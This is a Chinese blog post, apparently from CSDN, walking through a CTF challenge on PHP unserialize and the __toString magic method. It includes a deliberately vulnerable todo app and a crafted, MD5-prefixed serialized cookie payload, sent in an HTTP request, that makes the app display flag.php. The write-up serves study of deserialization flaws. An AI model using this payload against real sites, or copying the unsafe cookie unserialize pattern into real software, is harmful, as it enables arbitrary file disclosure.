CTF之序列化__toString

于 2022-12-04 19:06:18 发布
阅读量976 收藏
点赞数
分类专栏: CTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yyj1781572/article/details/128170172
版权
  1. 序列化简介

本质上serialize()和unserialize()在php内部的实现上是没有漏洞的,漏洞的主要产生是由于应用程序在处理对象,魔术函数以及序列化相关问题时导致的。

当传给unserialize()的参数可控时,那么用户就可以注入精心构造的payload当进行反序列化的时候就有可能会触发对象中的一些魔术方法,造成意想不到的危害。

2.__toString介绍

__toString()  是魔术方法的一种,具体用途是当一个对象被当作字符串对待的时候,会触发这个魔术方法 以下说明摘自PHP官方手册

public string __toString ( void )

__toString() 方法用于一个类被当成字符串时应怎样回应。例如 echo $obj; 应该显示些什么。此方法必须返回一个字符串,否则将发出一条 E_RECOVERABLE_ERROR 级别的致命错误。

Warning

不能在 __toString() 方法中抛出异常。这么做会导致致命错误。

Example #2 简单示例          

<?php

// Declare a simple class

class TestClass

{

    public $foo;

    public function __construct($foo)

    {

        $this->foo = $foo;

    }

    public function __toString() {

        return $this->foo;

    }

}

$class = new TestClass('Hello');

echo $class;

?>

3.ctf实例

<?php
Class readme{
    public function __toString()
    {
        return highlight_file('Readme.txt'true).highlight_file($this->sourcetrue);
    }
}
if(isset($_GET['source'])){
    $s = new readme();
    $s->source __FILE__;
    echo $s;
    exit;
}
//$todos = [];
if(isset($_COOKIE['todos'])){
    $c $_COOKIE['todos'];
    $h substr($c032);
    $m substr($c32);
    if(md5($m) === $h){
        $todos unserialize($m);
    }
}
if(isset($_POST['text'])){
    $todo $_POST['text'];
    $todos[] = $todo;
    $m serialize($todos);
    $h md5($m);
    setcookie('todos'$h.$m);
    header('Location: '.$_SERVER['REQUEST_URI']);
    exit;
}
?>
<html>
<head>
</head>

<h1>Readme</h1>
<a href="?source"><h2>Check Code</h2></a>
<ul>
<?php foreach($todos as $todo):?>
    <li><?=$todo?></li>
<?php endforeach;?>
</ul>

<form method="post" href=".">
    <textarea name="text"></textarea>
    <input type="submit" value="store">
</form>

4.测试过程

    4.1片段代码进行测试 

<?php

Class readme{

    public function __toString()

    {

        return highlight_file('Readme.txt', true).highlight_file($this->source, true);

    }

}

if(isset($_GET['source'])){

    $s = new readme();

    $s->source = 'flag.php';

    echo $s;

    exit;

}    

 看到可以读取到内容

4.2 测试判断

if(isset($_COOKIE['todos'])){
    $c $_COOKIE['todos'];
    $h substr($c032);
    $m substr($c32);
    if(md5($m) === $h){
        $todos unserialize($m);
    }
}

判断cookie 是否存在todos 存在值即进行字符截取

$h 从开始到32 截取

$m 取32长度之后的内容

如果md5加密与$h全等于则 执行   $todos unserialize($m);
 

这段进行md5加密 a:1:{i:0;O:6:"readme":1:{s:6:"source";s:8:"flag.php";}}

e2d4f7dcc43ee1db7f69e76303d0105ca:1:{i:0;O:6:"readme":1:{s:6:"source";s:8:"flag.php";}}

http://burp/repeat/1/uflp3bvlou3mvwuvck1wnae10h3awlhh

请求包

GET /ctf/demo/toString.php HTTP/1.1

Host: www.test1.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

cookie: todos=e2d4f7dcc43ee1db7f69e76303d0105ca%3a1%3a{i%3a0%3bO%3a6%3a"readme"%3a1%3a{s%3a6%3a"source"%3bs%3a8%3a"flag.php"%3b}}

jack-yyj
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctf序列
小飒的博客
08-19 1079
一、基础 序列和反序列 php中的两个函数 序列函数:serialize() 反序列函数:unserialize() 当在php中创建了一个对象后,可以通过serialize()把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。 具体使用如下: <?php class xu{ var $a='1'; } $class1=new xu; echo serialize($class1); ?> 运行结果:O:2:“xu”:1:{s:1:“a”;s:1:“1”;} 反序列 &
CTF_Web:反序列学习笔记(二)CTF经典考题由浅至深
AFCC_的博客(Web_Dog)
08-16 5762
0x00 CTF中的反序列题目 这类题目中主要是利用反序列各种魔术方法的绕过或调用,从而构造符合条件的序列字符串,完成特定的功能,在这一点上对于整个代码段的执行流程要很清楚。我们先从最简单的开始看起。 0x01 攻防世界unserialize3 题目显示的源码为: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 在这里我们可以看到只有一个魔术方法,而__w
ctf 序列与反序列
eliforsharon的博客
01-25 2085
目录序列后覆盖后方参数 序列后覆盖后方参数 链接: 参见题目[0CTF 2016]piapiapia1. 本题可以通过上传数据并将其序列存储,然后再进行反序列进行显示。题目关键即在于要从file_get_contents函数中读取config.php,而题目中直接上传的数据会进行md5处理,所以这里需要采用将数组中$nickname的值用 s:5:"photo";s:10:"config.php";} 进行封闭来覆盖后方参数,而考虑到值长度的变也会影响序列后表达。需要从题目中寻找将字符串由少变
CTF-web_php_serialize反序列
Be Smart
02-24 813
一.根据题目猜测和反序列漏洞有关 1.思路: 进入实验环境后,发现是一段php代码,通过接受get请求方式将提交过来的var的值, 先进行base64解码,再进行正则的判断,如果不匹配成功就会反序列输入的参数值。 所以这里我们目的就是为了绕过正则表达式,让其反序列出我们要的fl4g.php,再通过析构函数,高亮出fl4g文件中的内容。 2.步骤: 通过代码中的注释我们发现flag在fl4g.php这个文件里面,所以我们要将其序列 编写一段代码先实例我们要序列的类,这里吧fl4g.php传进去,
php序列与反序列+ctf题目
qq_42364315的博客
08-05 5200
现在在ctf比赛中PHP的反序列题目出得有一些多,当然,是我感觉的 emmm 之前没有怎么好好去了解这个问题 碰到这类题目的时候都是代码好的同学在做 然后这段时间看了一下这些东西 就写一些东西吧 自己的想法 ——————————————————————————分割线———————————————————————————— 首先 什么是序列 在php中序列话原名叫串行 又叫序列 对象...
__tostring()方法是快速获取对象字符串的信息。
will5451的博客
03-24 3311
__tostring()方法是快速获取对象字符串的信息。 __toString()的作用 当我们调试程序时,需要知道是否得出正确的数据。比如打印一个对象时,看看这个对象都有哪些属性,其值是什么,如果类定义了toString方法,就能在测试时,echo打印对象体,对象就会自动调用它所属类定义的toString方法,格式输出这个对象所包含的数据。
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
CTF工具之QR_research二维码(misc).rar
09-16
此工具用于学习交流用途,切勿用于其它用途。
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
最好的java对象ToString处理方案,ToString基类
05-16
每个项目我都必用的工具类,使用非常简单,放到项目目录中,java对象继承这个ToString类就可以,用在代码日志里特别方便,还支持过滤特定字段,满足日志保密性要求
轩禹CTF_RSA工具3.6.1.zip
最新发布
01-29
CTF常用工具集
__tostring和__invoke 方法
weixin_30236595的博客
07-04 114
首先放上代码: 1 <?php 2 class MagicTest{ 3 //__tostring会在把对象转换为string的时候自动调用 4 public function __tostring() { 5 return "This is the class MagicTest"; 6 } 7 //__inv...
CTF——Web——PHP序列和反序列
小锤队长的博客
08-09 5690
PHP 序列和反序列: 1,序列(串行):是将变量转换为可保存或传输的字符串的过程; 反序列(反串行):就是在适当的时候把这个字符串再转成原来的变量使用。 这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。 常见的php系列和反系列方式主要有:serialize,unserialize;json_encode,json_decode 在进行类的序列...
ctf中的php序列与反序列
qq_45414878的博客
11-08 1485
ctf中的php序列与反序列 刚开始学的php序列与反序列,有点雨里雾里的,于是做个笔记~~ 首先我们来了解一下概念知道他是怎么样的一个东西: 序列(串行):是将变量转换为可保存或传输的字符串的过程; 反序列(反串行):就是在适当的时候把这个字符串再转成原来的变量使用。 这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。 然后了解魔术方法: __construct: 在创建对象时候初始对象,一般用于对变量赋初值。 __destruct: 和构造函数相反,当对象所在函数调用完
ctfweb-PHP反序列
qq_51862722的博客
07-12 405
ctfweb-PHP反序列 我的blog,欢迎来玩 学习了一下php反序列漏洞,并做了一些整理。 简单理解 serialize将一个对象转换成一个字符串 unserialize将一个字符串还原成一个对象 序列: 如图所示: O:6:"People":2:{s:4:"name";s:4:"jack";s:3:"age";i:18;} 就是我们输入的people信息经过序列得到的字符串,其中 需要注意的是: \x00 + 类名 + \x00 + 变量名 反序列出来的是private变量 \x.
CTF-反序列
qq_61774705的博客
08-15 4274
序列
使用toString()检测对象类型
weixin_30497527的博客
09-12 229
可以通过toString()来获取每个对象的类型。为了每个对象都能通过Object.prototype.toString()来检测,需要以Function.prototype.call()或者Function.prototype.apply()的形式来调用,传递要检查的对象作为第一个参数,称为thisArg。 var toString = Object.prototype.to...
ctf+php反序列,CTF中的PHP反序列漏洞简单分析
weixin_39965881的博客
04-02 1693
本帖最后由 icq_8bf67fe65 于 2018-9-2 21:20 编辑本文原创作者:Versi0n,本文属i春秋原创奖励计划,未经许可禁止转载!一、前言在ctf比赛中,经常会遇到php反序列漏洞的题,今天就来简单分析下该漏洞的正确食用姿势~二、正文1.基础知识PHP序列:php为了方便进行数据的传输,允许把复杂的数据结构,压缩到一个字符串中,使用serialize()函数。PHP反序列...
ctf Web_php_include
08-28
CTF(Capture The Flag)是一种网络安全竞赛,其中参与者需要解决各种与网络安全相关的问题。"Web_php_include" 是一个问题的提示,暗示了一个与 PHP 文件包含漏洞相关的 CTF 题目。 PHP 文件包含漏洞是一种常见的 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jack-yyj

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值